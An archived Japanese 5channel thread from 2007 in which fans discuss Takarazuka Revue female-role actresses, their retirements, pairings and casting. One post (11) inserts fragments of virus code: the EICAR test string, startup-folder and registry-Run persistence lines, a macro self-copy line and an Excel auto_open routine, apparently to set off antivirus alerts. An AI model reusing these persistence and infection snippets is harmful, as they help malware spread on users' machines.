5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆ 宝塚・娘役を語るスレッド 10人目 ☆

1 :名無しさん@花束いっぱい。:2007/01/07(日) 23:33:22 ID:7oXxhZ7h
引き続き娘役について語りましょう。
980踏んだ方は、次スレよろしく。

↓前スレ
宝塚・娘役を語るスレッド 8人目[綺麗ですのよ♪] (実質Part9)
http://hobby8.2ch.net/test/read.cgi/siki/1163165518/

2 :名無しさん@花束いっぱい。:2007/01/07(日) 23:33:28 ID:7oXxhZ7h
過去スレ

01 http://hobby5.2ch.net/test/read.cgi/siki/994649126/
02 http://hobby8.2ch.net/test/read.cgi/siki/1118841889/
03 http://hobby8.2ch.net/test/read.cgi/siki/1122477150/
04 http://hobby8.2ch.net/test/read.cgi/siki/1128589715/
05 http://hobby8.2ch.net/test/read.cgi/siki/1135245547/
06 http://hobby8.2ch.net/test/read.cgi/siki/1140886086/
07 http://hobby8.2ch.net/test/read.cgi/siki/1151115125/
08 http://hobby8.2ch.net/test/read.cgi/siki/1160294372/
09 http://hobby8.2ch.net/test/read.cgi/siki/1163165518/

3 :名無しさん@花束いっぱい。:2007/01/08(月) 00:48:10 ID:lDFJQpPe
>>1
前スレ980です。私が不甲斐ないばかりにスレ立てをお任せしてしまい
申し訳ありませんでした。

4 :名無しさん@花束いっぱい。:2007/01/08(月) 01:22:50 ID:8jf263kB
>1
乙華麗様

5 :名無しさん@花束いっぱい。:2007/01/08(月) 01:33:26 ID:Y/ivc3yF
>>1
乙!お茶ドゾー旦~

前スレから引っ張ってアレだが、かしるいでこそ
黒トカゲみたいなのが観たかったな。


6 :名無しさん@花束いっぱい。:2007/01/08(月) 01:42:03 ID:yRphqeF0
>>1
乙です!

エリザも今のコンビならかしるいのが良かった様な。
とうあすでも良さそうなのに、何でよりによってミズとな…。

7 :名無しさん@花束いっぱい。:2007/01/08(月) 01:47:11 ID:nAwimxil
1様dです。
スレタイ直してくださってありがとう。

8 :名無しさん@花束いっぱい。:2007/01/08(月) 01:53:22 ID:BcJGZ5ce
>>1 乙、です。

黒蜥蜴って近年ならるい、あすか、みどり辺りで見たかった。
キムシン潤色だか脚色版だから期待はしてないけど、題材が勿体ないな〜と思う。

9 :タイガー ◆u.TIGERV.k :2007/01/08(月) 03:43:48 ID:x2evUkEB
乙華麗なる一族。>>1

10 :名無しさん@花束いっぱい。:2007/01/08(月) 14:44:44 ID:411IXwSa
それで、カシロキホって何だったの退団理由教えて!!!!

11 :名無しさん@花束いっぱい。:2007/01/08(月) 18:52:14 ID:pwxozNCH
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

12 :名無しさん@花束いっぱい。:2007/01/08(月) 22:06:54 ID:VVUATESN
久しぶりに宙組みてきたー
たっちん可愛いじゃん!!もっと地味子ちゃんかと思ってた。
娘2でも全然いいよー。
歌声は鳥肌モノだったし。
アリスちゃんも可愛かったけど、お化粧下手なの?もったいないよ。

13 :名無しさん@花束いっぱい。:2007/01/08(月) 22:19:14 ID:OgPmrXOT
エリザはとうあすでは見たくない。
2人も歌えるけど、イメージが違いすぎる
もっと2人にあった作品を当てて欲しい・・・
グランドホテルとかあんな感じのを見たい

14 :名無しさん@花束いっぱい。:2007/01/08(月) 22:52:23 ID:RDJeQoFZ
とうあすでMr.&Mrs.スミスがみたいなぁ。
とうあすは同僚とかそういう感じだもの

15 :名無しさん@花束いっぱい。:2007/01/09(火) 00:11:57 ID:GVInWjWr
>>13
ヘイズのあすか→フラムシェンに即脳内変換出来たw

16 :名無しさん@花束いっぱい。:2007/01/09(火) 00:12:09 ID:HyXdXi6H
コンビ語るなら該当のスレでどうぞ

17 :名無しさん@花束いっぱい。:2007/01/09(火) 03:51:33 ID:h5llOw/C
るいるいにエリザは無理。
いまが一番輝いているから、ここで卒業で良かったと思う。

18 :名無しさん@花束いっぱい。:2007/01/09(火) 08:53:08 ID:U8res4Cy
やってもいないのに無理って………

自分的にはやらせてみたい娘役であることは確か。

19 :名無しさん@花束いっぱい。:2007/01/09(火) 09:01:00 ID:wCsqLNda
1作で辞めると知らなかったときは、となあすかなみるいるいで役替わりなんて面白いなあ
あったら全パターン観にいくなあ、と思ったけどな。

実際タイトルロールを役替わりなんて無理な話だけど、ちょっと観てみたかった気はするよ。

20 :名無しさん@花束いっぱい。:2007/01/09(火) 09:11:38 ID:AI6GHfPA
るいに無理ならとなみにだって無理だろ。
大根から。

21 :名無しさん@花束いっぱい。:2007/01/09(火) 13:13:16 ID:ZMBotb/6
るいっ子は1作退団でしかもかしちゃんと相性が良いから
評価が上がってる部分も多いと思う。
かなみあすかとなみ達と同じ様に数作やってると
やっぱり少し地味とか、老け顔とか色々出てくるとオモ

22 :名無しさん@花束いっぱい。:2007/01/09(火) 13:37:17 ID:vPKQoMgA
>>21
たしかにそういう部分もあると思うけど・・・。
るいるいはカシの前では、めちゃくちゃ可愛いんだよなー。

23 :名無しさん@花束いっぱい。:2007/01/09(火) 13:42:52 ID:COEVf74A
るいちゃんよか、はるかに地味で老け顔な娘役さんが、主演を何作もされちゃって
かなりツラかった・・・後半はあきらかに、宛てる役すら主演娘役のそれではなくなってしまい。
もう二度とそういう失敗は繰り返さないでほしいので
るいちゃんの勇退には拍手を贈ります。


24 :名無しさん@花束いっぱい。:2007/01/09(火) 17:03:13 ID:CbGPw1k2
皆さんが小顔だと思う現役娘役はどなたですか?
舞台では感じなくても、入り出を見て小さいなと思うことがよくあるのですが。一般人に比べて小さい方が多いですね。
最近思ったのは白羽さん、晴華さんでした。意外だったので余計に・・

25 :名無しさん@花束いっぱい。:2007/01/09(火) 19:44:25 ID:m3lwIVa8
>>24
二人ともでかいイメージあるよね。
入り出でみると顔の大きさはもちろん、華奢で驚く…

小顔はウメかなー。まーちゃん超極小だったけどOGになっちゃったし。
シナも小顔だけど、あの子は全体的に小さいから倍率的には普通なのかも?

26 :名無しさん@花束いっぱい。:2007/01/09(火) 20:06:30 ID:+0GPswR9
まーちゃんは超極小だったけど、
相手役が余裕でその上を行く超極小だったから・・・

27 :名無しさん@花束いっぱい。:2007/01/09(火) 20:08:46 ID:8LkdPlaC
一花も超小顔。
一花やシナのあの身長で「顔でかっ!」ってならない時点で小顔だよね。

28 :名無しさん@花束いっぱい。:2007/01/09(火) 22:07:02 ID:cdFpCu/P
>るいちゃんの勇退には拍手を贈ります。
勇退じゃなくて劇団から任期決められてたんだよ。

29 :名無しさん@花束いっぱい。:2007/01/09(火) 22:43:07 ID:56ADnkcC
>>26
ソレダ(・∀・)!

舞台見てまーちゃんが小顔だって思ったことなかったけど、それは相手役のせいかww

30 :名無しさん@花束いっぱい。:2007/01/10(水) 01:06:10 ID:4h0nEYcn
まーちゃん自身はジェンヌ比で行くと結構小顔なのにねぇ・・・
相手役は超小顔&童顔&小柄男役&相手役に興味なし。
ここまで娘役泣かせなトップも珍しいよね。

31 :名無しさん@花束いっぱい。:2007/01/10(水) 01:25:13 ID:qVGP+kU1
>>28
るいちゃんもるいちゃんファンもタニと組む気満々だったね。
まさか、切られるとは思って無かったんだろうね。



32 :名無しさん@花束いっぱい。:2007/01/10(水) 14:15:47 ID:AMa7NcTx
まーちゃんファン
今度はいまさらのるい叩きっすか

地味同士とはいえ、るいのほうが哀れな最後じゃなかっただけマシな気がする

33 :名無しさん@花束いっぱい。:2007/01/10(水) 18:07:00 ID:lFRqach5
どう読んでもまーファンかなんてわからないんですが…

となみエリザいかがですかね。
歌ったり演技しだすとアレレなのかもしれないけど、
やっぱりエリザには美貌が必要だなーと改めて思ったyo

34 :名無しさん@花束いっぱい。:2007/01/10(水) 18:17:57 ID:5r1pARkR
>>33
会見は本人じゃなくプロのメイクだからしょうがないけど
あのとなみが妖怪人間ベラになってる。しかも丸顔のベラw
本来のとなみの良ささえ全部消えているね。
となみ元々エリザはキャラ違いだからな。とりあえずガンガレ。

35 :名無しさん@花束いっぱい。:2007/01/10(水) 18:30:35 ID:rkL2gMml
とりあえず前雪1には逆立ちしたってできないエリザ
となみを貶さんでもいいじゃないか
成仏出来ないのかね

36 :名無しさん@花束いっぱい。:2007/01/10(水) 21:05:40 ID:4h0nEYcn
そら、前雪1にはエリザ出来んとオモw
顔だけなら綺麗だろうけど、声が低すぎw

37 :名無しさん@花束いっぱい。:2007/01/11(木) 00:30:23 ID:Fye9AfQH
まーエリザ
ふーエリザ
檀エリザ
エミクラエリザ
あきエリザ

一番みたくないのは?

38 :名無しさん@花束いっぱい。:2007/01/11(木) 00:33:39 ID:iw8D1dBC
そんなことを書くあんたの顔

39 :名無しさん@花束いっぱい。:2007/01/11(木) 00:44:58 ID:dRbMnO0m
あきちゃんのエリザはここに並べるほど悪くないと思うけどな。

40 :名無しさん@花束いっぱい。:2007/01/11(木) 01:41:24 ID:4noxn6pm
>>37
となみエリザ
華やかとか言い訳せず良く見れば、その中の誰よりも変な顔だから

11 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)